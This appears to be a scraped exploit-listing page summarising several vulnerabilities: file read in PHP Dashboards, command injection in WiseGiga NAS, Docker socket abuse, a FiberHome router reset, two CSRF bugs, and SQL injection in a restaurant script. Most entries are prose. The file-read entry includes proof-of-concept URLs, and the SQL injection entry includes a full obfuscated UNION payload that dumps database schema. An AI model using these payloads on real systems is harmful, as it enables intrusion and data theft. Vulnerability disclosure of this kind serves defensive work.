
Explore Vulnerabilities

Explore all Exploits:

PHP Dashboards NEW 4.4 – Arbitrary File Read

The vulnerability allows an attacker to read arbitrary files. Proof of Concept:
1 http://localhost/[PATH]/php/file/read.php?filename=[FILE]
2 http://localhost/[PATH]/php/file/readxls.php?filename=[FILE]
http://localhost/[PATH]/php/file/PHPReader/temp/[.......].xls
Etc.

Vulnerabilities summary in WiseGiga NAS devices

User-controlled input is not sufficiently sanitized and can be exploited by an attacker to get sensitive information (for example, passwords). By sending a GET request to the following URIs with filename= as a parameter, an attacker can trigger the vulnerabilities. By sending a GET request to /mobile/download_file2.php an attacker can trigger the vulnerability. The WiseGiga NAS firmware contains pre.php files in the different directories. By sending a GET request to the following URIs with cmd= as a parameter, an attacker can trigger the vulnerability. The WiseGiga NAS firmware contains pre.php files in the different directories. By sending a POST request to the following URIs with cmd= as a parameter, an attacker can trigger the vulnerability. The WiseGiga NAS firmware contains pre.php files in the different directories. By sending a GET request to the following URIs with cmd= as a parameter, an attacker can trigger the vulnerability. The WiseGiga NAS firmware contains default accounts.

Docker Daemon – Unprotected TCP Socket Exploit

Using Docker via an unprotected TCP socket (2375/tcp, maybe 2376/tcp with TLS but without tls-auth), an attacker can create a Docker container with the '/' path mounted with read/write permissions on the host server that is running the Docker container. Because the Docker container executes commands as uid 0, this is honored by the host operating system, allowing the attacker to edit or create files owned by root. This exploit abuses this to create a cron job in the '/etc/cron.d/' path of the host server. The Docker image should exist on the target system or be a valid image from hub.docker.com.

FiberHome Unauthenticated ADSL Router Factory Reset.

This vulnerability in the AN1020-25 router enables an anonymous, unauthorized attacker to bypass authentication and access the function that resets the router to factory settings, resulting in an unauthorized operation that returns it to its factory state. It later allows the attacker to log in to the router's main page with the default username and password.

Nimble Professional – Mobile Marketing Text Blast Web Application 1.0 – Cross-Site Request Forgery (Update Admin)

This vulnerability allows an attacker to update the admin profile of Nimble Professional - Mobile Marketing Text Blast Web Application 1.0. An attacker can craft a malicious HTML page containing a form with the necessary parameters and submit it to the vulnerable application. This will allow the attacker to update the admin profile with the provided values.

jRank – Topsites Script 1.0 – Cross-Site Request Forgery

jRank Topsites Script version 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can exploit this vulnerability to perform administrative actions on behalf of the administrator. This can be done by tricking the administrator into clicking a malicious link or visiting a malicious website. The malicious website can contain a crafted HTML form with hidden parameters that will be automatically submitted to the vulnerable application. This can be used to perform administrative actions such as creating a new user, changing the administrator's password, etc.

Restaurant Website Script 1.0 – SQL Injection

The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/cms.php?id=[SQL]
-6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
http://localhost/[PATH]/contact.php?id=[SQL]

Recent Exploits: